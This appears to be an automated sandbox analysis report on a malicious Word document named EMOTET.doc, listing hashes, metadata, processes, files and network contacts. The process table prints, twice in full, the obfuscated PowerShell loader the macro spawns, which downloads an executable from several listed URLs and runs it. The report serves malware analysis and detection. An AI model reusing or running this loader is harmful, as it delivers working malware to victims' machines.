File name: | EMOTET.doc |
Full analysis: | https://app.any.run/tasks/12299ab1-a5d0-4f57-a80d-45ec4e6f94da |
Verdict: | Malicious activity |
Analysis date: | January 17, 2020, 14:50:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: ViHzifOp, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 14 06:34:00 2017, Last Saved Time/Date: Thu Dec 14 06:34:00 2017, Number of Pages: 1, Number of Words: 1, Number of Characters: 11, Security: 0 |
MD5: | E8D9EB977EC98E7616AC0A358D1A44B3 |
SHA1: | F9B475CFF7F059645C511FFB0D5335DB81FE590A |
SHA256: | C52F09E474C5D9B316E0B8E5E839282E52268A79B03BEF1CEFAAEE4C2CEC793E |
SSDEEP: | 3072:a6WCv4rz7hnxKaCvT8SVlcP1nyfGfHm7cXSwQ3T6iveFgBuJWz:4z9EjlVmP1c0JQ3NsJ4 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | ViHzifOp |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2017:12:14 06:34:00 |
ModifyDate: | 2017:12:14 06:34:00 |
Pages: | 1 |
Words: | 1 |
Characters: | 11 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 11 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1096 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\EMOTET.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3796 | cmd hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set %TVTEimDaQlaTNit%=hqpCiruvT&&set %TQzjKjbpTs%=o^we^r^s&&set %LlcncNiALWEzjzz%=NLjbwkQEoIotK&&set %ntSiPjinh%=p&&set %wbaYkWAbmnYwSCH%=pNzrqJUjLTWbVXw&&set %TTjVYaz%=^he^l^l&&set %UYkqNvdbzcwSaYK%=fdiIPbKwDBiuPEN&&!%ntSiPjinh%!!%TQzjKjbpTs%!!%TTjVYaz%! "((' (Lsf((LPhfLPh+LPhuGfranc = LPh+LPLsf+LsfhnL'+'Ph+LPhew-obLsf+LsfjeLPh+Lsf+LsfLPhct System.NetLPh+LPh.WLPh+LPhebClLPh+LPhienLP'+'h+'+'LPht'+';fuGns'+'L'+'sf+LsfLPh+LPhadasd = nLPh'+'+Lsf+Ls'+'fLPhe'+'LPh+LPhw-object rando'+'m;fuGbLPh+LPhcd = JLPhLsf+Ls'+'f+LPhfLs'+'f+L'+'sfChttLsf+Lsfp:/LPh+Lsf+LsfLPh'+'/wwLPh+LPhw.LPh+LPhzaLPh+LPhvierLsf+LsfdesLPh+LPhign.cLPh+LPh'+'om/0mRP/,Lsf+LsfhttpLPh+LPh://wLLsf+LsfPh+LPhww.mivasoLPh+LPh.cl/sLPh'+'+LPhlhdLPh+LPh1dvLPh+LP'+'h/,LPh+LPhhtLPh+Lsf+LsfLPhtLPh+LPhp:LPh+LPh//www.autLsf+LsfomobiLsf+LsfleLP'+'h+LPh-bLPh+LPhebLP'+'h+LPhra.de/xLPh+LPhiLPh+LPhIItW/,hLPh+LPhttp'+'LPh+LPh://LPh+'+'LPhiiLPhLsf+Lsf+L'+'PhtaiLPhLsf+Lsf+LPhntLPh+LPhernationLPh+LPhalhouse.org/'+'LPh+LPhQGO0E/,httLPh+LPhp'+'LPh+LPh://fixLPh+LPhxoo.'+'in/pLPh+LPhublLPh+LPhic/LPh+LPhPRLm709/JLPh+LPhfC.SLsf+Lsfplit(JLPh+LPhfCLPh+LPh,LP'+'h+LPhJf'+'Lsf+LsfC)LPh+LPh;fuGkLPh+LPharLPh+LPhapas = fuLPh+'+'LPhGnsadasd.LPhLsf+L'+'sf+LP'+'hnextLPh+LLsf'+'+LsfPh(1, '+'Lsf+Lsf343245);fuGhuLPh+LPhas LPh+LPh= fuGenLPh+LPhv:Lsf+Ls'+'fpLPh+LPhublicLPh+LPh LPh+LPh+ JfCk79JfC Lsf+Lsf+Lsf+Lsf fuG'+'karapLPLsf+Lsfh+LPhas + LPh+LPhJfCLPh+LPh.exLPh+LPheJfC;foreac'+'h(fuGaLP'+'h+LPhbc in '+'fLPh+LPhuGbcdLPh+LPh){try{fuGf'+'LPh+LPhLsf+Lsfranc.DownloadFilLPh+LPhe(fuLPh+LPLsf+LsfhGLPh+LPhaLsf+Lsfbc.ToString(),Lsf+Lsf fuLsf+LsfGhLPh+LPhuaLPh+LPhs);LPh+LPhInvoke-'+'Item'+'LPLsf+'+'Lsfh+LPh(fuGhuaL'+'Ph+LPhLsf+Lsfs)LPh+LPh;brLsf+LsfeLPh+LPhak;}catch{wrLPh+LPhite-host fLsf+Lsfu'+'GLPh'+'+LPh_.Exception.MessaLPh+LPhgeLPh+LPh;}}LPh) -rEPLACe([CHAr]74+[CHAr]102+[CHAr]67),[C'+'HAr]39-rEPLACe LPhfuLsf+LsfGLPh,[CHAr]36 '+'-rEPLACe LPhk79LPh,[CHAr]92) O6g'+' . 
( gOhELsf+LsfNv:PLsf+LsfUBLIC[1Lsf+Lsf3]+gOheNv:publiC[5]+LPhXLPh)Lsf).rEplACE(([CHAr]79+[CHA'+'r]54+[CHAr]103),Lsfo8zLsf).rEplACE((['+'CHAr]1'+'03+[CHAr]79+[CHAr]104),[STriNG][CHAr]36).rEplACE(Ls'+'fLPhLsf,['+'STriNG][CHAr]39) o8z& ( mJqeNV:PUBLic[13]+'+'mJqENv:pubLIc[5]+LsfxLsf)') -crEpLacE 'Lsf',[CHAR]39 -RepLace 'mJq',[CHAR]36 -RepLace ([CHAR]111+[CHAR]56+[CHAR]122),[CHAR]124) |.( $eNv:publiC[13]+$env:PUBlIC[5]+'X') | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
896 | powershell "((' (Lsf((LPhfLPh+LPhuGfranc = LPh+LPLsf+LsfhnL'+'Ph+LPhew-obLsf+LsfjeLPh+Lsf+LsfLPhct System.NetLPh+LPh.WLPh+LPhebClLPh+LPhienLP'+'h+'+'LPht'+';fuGns'+'L'+'sf+LsfLPh+LPhadasd = nLPh'+'+Lsf+Ls'+'fLPhe'+'LPh+LPhw-object rando'+'m;fuGbLPh+LPhcd = JLPhLsf+Ls'+'f+LPhfLs'+'f+L'+'sfChttLsf+Lsfp:/LPh+Lsf+LsfLPh'+'/wwLPh+LPhw.LPh+LPhzaLPh+LPhvierLsf+LsfdesLPh+LPhign.cLPh+LPh'+'om/0mRP/,Lsf+LsfhttpLPh+LPh://wLLsf+LsfPh+LPhww.mivasoLPh+LPh.cl/sLPh'+'+LPhlhdLPh+LPh1dvLPh+LP'+'h/,LPh+LPhhtLPh+Lsf+LsfLPhtLPh+LPhp:LPh+LPh//www.autLsf+LsfomobiLsf+LsfleLP'+'h+LPh-bLPh+LPhebLP'+'h+LPhra.de/xLPh+LPhiLPh+LPhIItW/,hLPh+LPhttp'+'LPh+LPh://LPh+'+'LPhiiLPhLsf+Lsf+L'+'PhtaiLPhLsf+Lsf+LPhntLPh+LPhernationLPh+LPhalhouse.org/'+'LPh+LPhQGO0E/,httLPh+LPhp'+'LPh+LPh://fixLPh+LPhxoo.'+'in/pLPh+LPhublLPh+LPhic/LPh+LPhPRLm709/JLPh+LPhfC.SLsf+Lsfplit(JLPh+LPhfCLPh+LPh,LP'+'h+LPhJf'+'Lsf+LsfC)LPh+LPh;fuGkLPh+LPharLPh+LPhapas = fuLPh+'+'LPhGnsadasd.LPhLsf+L'+'sf+LP'+'hnextLPh+LLsf'+'+LsfPh(1, '+'Lsf+Lsf343245);fuGhuLPh+LPhas LPh+LPh= fuGenLPh+LPhv:Lsf+Ls'+'fpLPh+LPhublicLPh+LPh LPh+LPh+ JfCk79JfC Lsf+Lsf+Lsf+Lsf fuG'+'karapLPLsf+Lsfh+LPhas + LPh+LPhJfCLPh+LPh.exLPh+LPheJfC;foreac'+'h(fuGaLP'+'h+LPhbc in '+'fLPh+LPhuGbcdLPh+LPh){try{fuGf'+'LPh+LPhLsf+Lsfranc.DownloadFilLPh+LPhe(fuLPh+LPLsf+LsfhGLPh+LPhaLsf+Lsfbc.ToString(),Lsf+Lsf fuLsf+LsfGhLPh+LPhuaLPh+LPhs);LPh+LPhInvoke-'+'Item'+'LPLsf+'+'Lsfh+LPh(fuGhuaL'+'Ph+LPhLsf+Lsfs)LPh+LPh;brLsf+LsfeLPh+LPhak;}catch{wrLPh+LPhite-host fLsf+Lsfu'+'GLPh'+'+LPh_.Exception.MessaLPh+LPhgeLPh+LPh;}}LPh) -rEPLACe([CHAr]74+[CHAr]102+[CHAr]67),[C'+'HAr]39-rEPLACe LPhfuLsf+LsfGLPh,[CHAr]36 '+'-rEPLACe LPhk79LPh,[CHAr]92) O6g'+' . 
( gOhELsf+LsfNv:PLsf+LsfUBLIC[1Lsf+Lsf3]+gOheNv:publiC[5]+LPhXLPh)Lsf).rEplACE(([CHAr]79+[CHA'+'r]54+[CHAr]103),Lsfo8zLsf).rEplACE((['+'CHAr]1'+'03+[CHAr]79+[CHAr]104),[STriNG][CHAr]36).rEplACE(Ls'+'fLPhLsf,['+'STriNG][CHAr]39) o8z& ( mJqeNV:PUBLic[13]+'+'mJqENv:pubLIc[5]+LsfxLsf)') -crEpLacE 'Lsf',[CHAR]39 -RepLace 'mJq',[CHAR]36 -RepLace ([CHAR]111+[CHAR]56+[CHAR]122),[CHAR]124) |.( $eNv:publiC[13]+$env:PUBlIC[5]+'X') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
1096 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRB214.tmp.cvr | — | |
MD5:— | SHA256:— | |||
896 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TCSKOEAMQOJHM56FP1F3.temp | — | |
MD5:— | SHA256:— | |||
896 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A2ECA083537A02B6158458FF1752C63F | binary | |
MD5:B92B932DB9511C477EA3B7FD00731C00 | SHA256:6CDA4C84B5EB93A9C4A603DDEF0415E5B76CAB78F6756D286F796D98370B10FF | |||
896 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
896 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39bf72.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
1096 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:71834CB5A40FD067717E5E242FCFDDE2 | SHA256:053F9EECE736E49AA9E3C99DB635C70D83D2B9311D2D3CA8D612695DCF73376C | |||
1096 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$EMOTET.doc | pgc | |
MD5:77062AD3919613D252BBDA640BCF8E67 | SHA256:527B246D794ACF52454FC292293578EA8675DE33257846A9D35EDDFA9294DEF7 | |||
896 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A2ECA083537A02B6158458FF1752C63F | der | |
MD5:B15409274F54AD8F023D3B85A5ECEC5D | SHA256:25847D668EB4F04FDD40B12B6B0740C567DA7D024308EB6C2C96FE41D9DE218D | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
896 | powershell.exe | 34.208.67.28:443 | www.mivaso.cl | Amazon.com, Inc. | US | suspicious |
896 | powershell.exe | 2.19.43.67:80 | cert.int-x3.letsencrypt.org | Akamai International B.V. | — | unknown |
896 | powershell.exe | 34.208.67.28:80 | www.mivaso.cl | Amazon.com, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.zavierdesign.com | | malicious |
www.mivaso.cl | | whitelisted |
cert.int-x3.letsencrypt.org | | whitelisted |
mivaso.cl | | malicious |